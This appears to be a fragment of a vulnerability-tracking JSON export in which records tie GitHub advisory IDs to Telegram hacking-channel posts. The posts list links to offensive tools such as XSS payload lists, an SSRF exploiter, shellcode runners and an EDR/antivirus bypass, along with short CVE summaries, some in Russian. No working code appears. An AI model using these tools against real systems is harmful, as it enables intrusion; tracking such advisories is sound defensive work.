#infosec\n\nawesome-oracle-manipulation\n\nAwesome list of all things oracle manipulation. Creating to help spread a better understanding of oracles and oracle manipulation.\n\nhttps://github.com/0xcacti/awesome-oracle-manipulation\n\n#cybersecurity #infosec\n\nCheckov\n\nPrevent #cloud misconfigurations and find vulnerabilities during build-time in infrastructure as code, container images and open source packages with Checkov by Bridgecrew.\n\nhttps://github.com/bridgecrewio/checkov\n\n#cybersecurity #infosec\n\namd-lm32-smu-exploit\n\nGeneric #exploit for all version 7 (maybe others) LM32-based AMD SMU's used in APUs (and probably works on GPUs too)\n\nhttps://github.com/jevinskie/amd-lm32-smu-exploit\n\n#cybersecurity #infosec\n\nGretchen\n\nCisco TCL tool to stop Responder attacks.\n\nhttps://github.com/c4s73r/Gretchen\n\n#cybersecurity #infosec\n\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory", "creation_timestamp": "2023-05-30T15:18:17.000000Z"}, {"uuid": "1e6ba63d-4f8d-4c7b-8df0-cdc2796877f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatCommunity/7800", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-05-25T15:32:53.000000Z"}, {"uuid": "6f6e7fb7-73c3-40ab-bf3d-3323d7079d8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HH3-VJ32-GR6J", "type": "exploited", "source": "https://t.me/InfoSecInsider/23552", "content": "Tools  - Hackers Factory \n\nTookie-osint has a simple-to-use UI and is really straightforward. The main idea of Tookie-osint is to discover usernames that are requested from an input.\n\nhttps://github.com/Alfredredbird/tookie-osint\n\n#CyberDilara\n\nGPU poisoning; hide the payload inside the gpu memory.\n\nhttps://github.com/H1d3r/GPU_ShellCode\n\nThis is a simple obfuscator for WireGuard. It is designed to make it harder to detect WireGuard traffic by making it look like something else.\n\nhttps://github.com/ClusterM/wg-obfuscator\n\nSploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability.\n\nhttps://github.com/xaitax/SploitScan\n\nA shellcode runner write in Rust use\n\nhttps://github.com/b1tg/rs-shellcode\n\nKernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nZip Slip Vulnerability in .a Static Library Files.  Since the implemented measure can be bypassed, the vulnerability allows an attacker to extract files to any desired location within the server running #MobSF.\n\nhttps://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-4hh3-vj32-gr6j\n\nPython script to monitor your target continuously for new subdomains.\n\nhttps://github.com/faiyazahmad07/monitor_subdomains\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-27T05:30:34.000000Z"}, {"uuid": "ac5c4df7-4e1c-4e56-b6a8-e6bdc4b5b895", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3733-6V6M-39MH", "type": "published-proof-of-concept", "source": "https://t.me/GhostsForum/21710", "content": "Tools - Hackers Factory\n\nIt creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.\n\nhttps://github.com/Slowerzs/PPLSystem\n\nAgentic LLM Vulnerability Scanner \n\nhttps://github.com/msoedov/agentic_security\n\nA Chrome/Firefox browser extension to show alerts for reflected query params, show Wayback archive links for the current path, show hidden elements and enable disabled elements. \n\nhttps://github.com/msoedov/agentic_security\n\nPowerful+Fast Kubernetes service discovery tools via kubernetes DNS service. Currently supported service ip-port BruteForcing / AXFR Domain Transfer Dump / Coredns WildCard Dump \n\nhttps://github.com/Esonhugh/k8spider\n\nHTTP 403 bypass tool \n\nhttps://github.com/trap-bytes/403jump\n\n\nMOBEXLER - A Mobile Application Penetration Testing Platform\n\nhttps://github.com/enciphers-team/Mobexler/blob/master/docs/index.md\n\nA library for detecting known secrets across many web frameworks \n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nThe Yoast SEO plugin for WordPress is vulnerable to... \n\nhttps://github.com/advisories/GHSA-3733-6v6m-39mh\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nFuzz 401/403/404 pages for bypasses \n\nhttps://github.com/intrudir/BypassFuzzer\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nFully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. \n\nhttps://github.com/Syslifters/sysreptor\n\n#HackersFactory", "creation_timestamp": "2024-05-30T10:10:01.000000Z"}, {"uuid": "a47a4139-f9ad-4213-9f9b-c8c7f414a5ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/GhostsForum/21550", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-05-25T15:30:30.000000Z"}, {"uuid": "ff68ea34-785a-424b-afe4-f04386b5ec05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/GhostsForum/21710", "content": "Tools - Hackers Factory\n\nIt creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.\n\nhttps://github.com/Slowerzs/PPLSystem\n\nAgentic LLM Vulnerability Scanner \n\nhttps://github.com/msoedov/agentic_security\n\nA Chrome/Firefox browser extension to show alerts for reflected query params, show Wayback archive links for the current path, show hidden elements and enable disabled elements. \n\nhttps://github.com/msoedov/agentic_security\n\nPowerful+Fast Kubernetes service discovery tools via kubernetes DNS service. Currently supported service ip-port BruteForcing / AXFR Domain Transfer Dump / Coredns WildCard Dump \n\nhttps://github.com/Esonhugh/k8spider\n\nHTTP 403 bypass tool \n\nhttps://github.com/trap-bytes/403jump\n\n\nMOBEXLER - A Mobile Application Penetration Testing Platform\n\nhttps://github.com/enciphers-team/Mobexler/blob/master/docs/index.md\n\nA library for detecting known secrets across many web frameworks \n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nThe Yoast SEO plugin for WordPress is vulnerable to... \n\nhttps://github.com/advisories/GHSA-3733-6v6m-39mh\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nFuzz 401/403/404 pages for bypasses \n\nhttps://github.com/intrudir/BypassFuzzer\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nFully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. \n\nhttps://github.com/Syslifters/sysreptor\n\n#HackersFactory", "creation_timestamp": "2024-05-30T10:10:01.000000Z"}, {"uuid": "b5372456-121f-4445-9cea-a6728ad0d1f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ88-6MR5-RCW8", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3769", "content": "Tools - Hackers Factory \n\nA complete security assessment tool that supports common web security issues scanning and custom POC | Be sure to read the document before using.\n\nhttps://github.com/securi3ytalent/xray-automation\n\nInstantly share code, notes, and snippets\n\nhttps://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1\n\nEDR &amp; Antivirus Bypass to Gain Shell Access\n\nhttps://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access\n\nServe as a reverse proxy to protect your web services from attacks and exploits\n\nhttps://github.com/chaitin/SafeLine\n\n[Android] Display useful information about your device privacy\n\nhttps://github.com/akexorcist/ruam-mij-android\n\nMultiple bugs leading to info leak and remote code execution\n\nhttps://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8\n\nDownload all the wallpapers in MKBHD's \"Panels\" app\n\nhttps://github.com/nadimkobeissi/mkbsd\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-29T07:53:10.000000Z"}, {"uuid": "ca73c2c3-11e6-43f1-995f-437bc55d3369", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3733-6V6M-39MH", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3256", "content": "Tools - Hackers Factory\n\nIt creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.\n\nhttps://github.com/Slowerzs/PPLSystem\n\nAgentic LLM Vulnerability Scanner \n\nhttps://github.com/msoedov/agentic_security\n\nA Chrome/Firefox browser extension to show alerts for reflected query params, show Wayback archive links for the current path, show hidden elements and enable disabled elements. \n\nhttps://github.com/msoedov/agentic_security\n\nPowerful+Fast Kubernetes service discovery tools via kubernetes DNS service. Currently supported service ip-port BruteForcing / AXFR Domain Transfer Dump / Coredns WildCard Dump \n\nhttps://github.com/Esonhugh/k8spider\n\nHTTP 403 bypass tool \n\nhttps://github.com/trap-bytes/403jump\n\n\nMOBEXLER - A Mobile Application Penetration Testing Platform\n\nhttps://github.com/enciphers-team/Mobexler/blob/master/docs/index.md\n\nA library for detecting known secrets across many web frameworks \n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nThe Yoast SEO plugin for WordPress is vulnerable to... \n\nhttps://github.com/advisories/GHSA-3733-6v6m-39mh\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nFuzz 401/403/404 pages for bypasses \n\nhttps://github.com/intrudir/BypassFuzzer\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nFully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. \n\nhttps://github.com/Syslifters/sysreptor\n\n#HackersFactory", "creation_timestamp": "2024-05-30T10:08:39.000000Z"}, {"uuid": "14e7fa51-22f3-435d-8a9e-70abba40525c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3256", "content": "Tools - Hackers Factory\n\nIt creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.\n\nhttps://github.com/Slowerzs/PPLSystem\n\nAgentic LLM Vulnerability Scanner \n\nhttps://github.com/msoedov/agentic_security\n\nA Chrome/Firefox browser extension to show alerts for reflected query params, show Wayback archive links for the current path, show hidden elements and enable disabled elements. \n\nhttps://github.com/msoedov/agentic_security\n\nPowerful+Fast Kubernetes service discovery tools via kubernetes DNS service. Currently supported service ip-port BruteForcing / AXFR Domain Transfer Dump / Coredns WildCard Dump \n\nhttps://github.com/Esonhugh/k8spider\n\nHTTP 403 bypass tool \n\nhttps://github.com/trap-bytes/403jump\n\n\nMOBEXLER - A Mobile Application Penetration Testing Platform\n\nhttps://github.com/enciphers-team/Mobexler/blob/master/docs/index.md\n\nA library for detecting known secrets across many web frameworks \n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nThe Yoast SEO plugin for WordPress is vulnerable to... \n\nhttps://github.com/advisories/GHSA-3733-6v6m-39mh\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nFuzz 401/403/404 pages for bypasses \n\nhttps://github.com/intrudir/BypassFuzzer\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nFully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. \n\nhttps://github.com/Syslifters/sysreptor\n\n#HackersFactory", "creation_timestamp": "2024-05-30T10:08:39.000000Z"}, {"uuid": "ea586449-0482-4f8f-95c6-f7fa72333daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3248", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-05-25T15:30:14.000000Z"}, {"uuid": "a7e74b4e-64d2-4718-8beb-302487e63539", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9R2W-394V-53QC", "type": "seen", "source": "Telegram/ZK8UWIACqT8g-6pykx6INiDxIZvKfmqcbLj32GalwM8eXLrH", "content": "", "creation_timestamp": "2025-03-19T20:46:25.000000Z"}, {"uuid": "3c3d4a05-58ef-4ef4-92b3-b3ca9078a6f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ88-6MR5-RCW8", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7478", "content": "Tools - Hackers Factory \n\nA complete security assessment tool that supports common web security issues scanning and custom POC | Be sure to read the document before using.\n\nhttps://github.com/securi3ytalent/xray-automation\n\nInstantly share code, notes, and snippets\n\nhttps://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1\n\nEDR &amp; Antivirus Bypass to Gain Shell Access\n\nhttps://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access\n\nServe as a reverse proxy to protect your web services from attacks and exploits\n\nhttps://github.com/chaitin/SafeLine\n\n[Android] Display useful information about your device privacy\n\nhttps://github.com/akexorcist/ruam-mij-android\n\nMultiple bugs leading to info leak and remote code execution\n\nhttps://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8\n\nDownload all the wallpapers in MKBHD's \"Panels\" app\n\nhttps://github.com/nadimkobeissi/mkbsd\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-29T07:52:22.000000Z"}, {"uuid": "7d16a3aa-4ad9-413a-ba03-f67758cdaa47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5Q3-C8RM-W787", "type": "published-proof-of-concept", "source": "https://t.me/cybersecs/3016", "content": "\u042f \u043e\u0431\u044b\u0447\u043d\u043e \u043d\u0435 \u0440\u0443\u0433\u0430\u044e\u0441\u044c, \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u0442\u0443\u0442, \u043d\u043e \u044d\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u043e \"\u0435\u0431\u0430\u043d\u044b\u0439 \u0441\u0442\u044b\u0434\"\n\nCVE-2024-9313 \nSeverity: High (8.8) \nOs: Ubuntu\nTarget : PAM module\nAffected versions: &lt; 0.3.5\n\n\u0412 \u0434\u0432\u0443\u0445 \u0441\u043b\u043e\u0432\u0430\u0445, \u043c\u043e\u0436\u043d\u043e \u0432 su|sudo|sshd \u0432\u0432\u0435\u0441\u0442\u0438 \u0438\u043c\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0430 \u043f\u0430\u0440\u043e\u043b\u044c \u0432\u0432\u0435\u0441\u0442\u0438 \u043e\u0442 \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u0438 \u044d\u0442\u043e \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442....\n\u042d\u0442\u043e, \u0441\u0443\u0434\u044f \u043f\u043e \u0432\u0441\u0435\u043c\u0443, \u043d\u0435 \u043a\u0430\u0441\u0430\u0435\u0442\u0441\u044f \u0432\u0430\u0448\u0435\u0439 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u0443\u0431\u0443\u043d\u0442\u044b, \u0440\u0435\u0447\u044c \u0438\u0434\u0435\u0442 \u043f\u0440\u043e\n\nAuthd is an authentication daemon for cloud-based identity providers. It helps ensure the secure management of identity and access for Ubuntu machines anywhere in the world, on desktop and the server. Authd's modular design makes it a versatile authentication service that can integrate with multiple identity providers. MS Entra ID is currently supported and several other identity providers are under active development.\n\n, \u043d\u043e \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u044d\u0442\u043e \ud83e\udd26\u200d\u2642\ufe0f\ud83e\udd26\u200d\u2642\ufe0f\ud83e\udd26\u200d\u2642\ufe0f.\n\nhttps://github.com/ubuntu/authd/security/advisories/GHSA-x5q3-c8rm-w787", "creation_timestamp": "2024-10-04T19:49:36.000000Z"}, {"uuid": "481b67ad-43f9-482d-ad3f-051c06a71b78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VHXG-9WFX-7FCJ", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/540", "content": "CVE-2022-2566 : FFmpeg &lt; 5.1 - Heap Out-Of-Bounds Write in build_open_gop_key_points -&gt; Rce\nPOC : https://github.com/google/security-research/security/advisories/GHSA-vhxg-9wfx-7fcj", "creation_timestamp": "2022-10-07T10:30:05.000000Z"}, {"uuid": "6437a6fa-e9ba-4a3d-9c38-25d1c9af1868", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQCX-CCGC-XWHV", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/891", "content": "CVE-2023-3824 : PHP &lt; 8.0.30 Buffer overflow and overread in phar_dir_read()\nSummary : \nBuffer mismanagement in phar_dir_read() causes a buffer overflow and a buffer overread later.\nDetails  : \nhttps://github.com/php/php-src/blob/be71cadc2f899bc39fe27098042139392e2187db/ext/phar/dirstream.c#L89C1-L116\nPOC : https://github.com/php/php-src/security/advisories/GHSA-jqcx-ccgc-xwhv", "creation_timestamp": "2023-09-02T23:00:03.000000Z"}, {"uuid": "567a71f0-4887-4317-87e6-f307562e29c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2GGP-CMVM-F62F", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/877", "content": "CVE-2023-39523 : Command Injection in docker fetch process\n\nPossible command injection in the docker pull process as it allows malicious commands to be added to the docker_reference parameter.\n\n PoC : https://github.com/nexB/scancode.io/security/advisories/GHSA-2ggp-cmvm-f62f", "creation_timestamp": "2023-08-28T22:47:21.000000Z"}, {"uuid": "4d0e9b0b-9390-4ecf-8b6a-6fc5a45b37c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJ95-55CR-9597", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/874", "content": "CVE-2023-36480 : Aerospike Java Client 6.1.7 |version| - Remote Code Execution (RCE) \nGHSL : https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597", "creation_timestamp": "2023-08-28T22:47:09.000000Z"}, {"uuid": "44e9bd64-c257-4d2d-b8f4-255973152123", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1408", "type": "seen", "source": "https://t.me/ctinow/211790", "content": "https://ift.tt/Q4U6RMr\nRHSA-2024:1408: Moderate: emacs security update", "creation_timestamp": "2024-03-19T18:16:36.000000Z"}, {"uuid": "7722efc9-453c-4893-8170-7eddb46498c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JCJX-PVPC-QGWQ", "type": "published-proof-of-concept", "source": "https://t.me/NeKaspersky/1375", "content": "\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u041f\u041e \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0447\u0430\u0442\u0430\u043c\u0438, \u0444\u043e\u0440\u0443\u043c\u0430\u043c\u0438 \u0438 \u0441\u043f\u0438\u0441\u043a\u0430\u043c\u0438 \u0440\u0430\u0441\u0441\u044b\u043b\u043e\u043a Discourse \u043f\u0440\u043e\u0441\u044f\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e 2.7.9 \u0438\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438\u0437-\u0437\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-41163 \u0441 \u0440\u0435\u0439\u0442\u0438\u043d\u0433\u043e\u043c CVSS 10. \u041e\u043d\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u0438\u0437-\u0437\u0430 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u0432\u0435\u0440\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0439 subscribe_url. \n\n\u0423 Discourse \u0431\u043e\u043b\u044c\u0448\u0435 2000 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432(\u043a\u0430\u043a \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435), \u043e\u043d\u0430 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 31 000 \u0441\u0430\u0439\u0442\u043e\u0432, \u043e\u043a\u043e\u043b\u043e 14 000 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b. \n\nCISA \u0434\u0430\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u043e \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0435 \u043a \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c, \u0447\u0442\u043e\u0431\u044b \u0442\u0435 \u0441\u0434\u0435\u043b\u0430\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0438\u043b\u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043d\u0430 \u0432\u043e\u0441\u0445\u043e\u0434\u044f\u0449\u0435\u043c \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u043a\u0430\u0436\u0434\u044b\u0439 \u0437\u0430\u043f\u0440\u043e\u0441, \u043d\u0430\u0447\u0438\u043d\u0430\u044e\u0449\u0438\u0439\u0441\u044f \u0441 /webhooks/aws. \n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0442\u0443\u0442:\n\nhttps://github.com/discourse/discourse/security/advisories/GHSA-jcjx-pvpc-qgwq", "creation_timestamp": "2021-10-26T19:15:29.000000Z"}, {"uuid": "16eb4633-1c63-43f5-b318-c7fdfec059ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63H4-W25C-3QV4", "type": "seen", "source": "https://t.me/ctinow/207617", "content": "https://ift.tt/x0Tkb2D\nCVE-2024-27087 | kirby up to 4.1.0 javascript URL link cross site scripting (GHSA-63h4-w25c-3qv4)", "creation_timestamp": "2024-03-14T10:51:58.000000Z"}, {"uuid": "f68d1f08-9aac-497c-80b2-b69da6d59194", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PHFX-X4Q3-W99V", "type": "seen", "source": "https://t.me/arpsyndicate/798", "content": "#ExploitObserverAlert\n\nGHSA-phfx-x4q3-w99v\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-PHFX-X4Q3-W99V. An issue was discovered in ownCloud owncloud/oauth2 before 0.6.1, when Allow Subdomains is enabled. An attacker is able to pass in a crafted redirect-url that bypasses validation, and consequently allows an attacker to redirect callbacks to a Top Level Domain controlled by the attacker.\n\nGHSS: 8.7", "creation_timestamp": "2023-11-30T08:14:29.000000Z"}, {"uuid": "4568ca98-69ac-4b1e-8aba-98ed42b844ff", 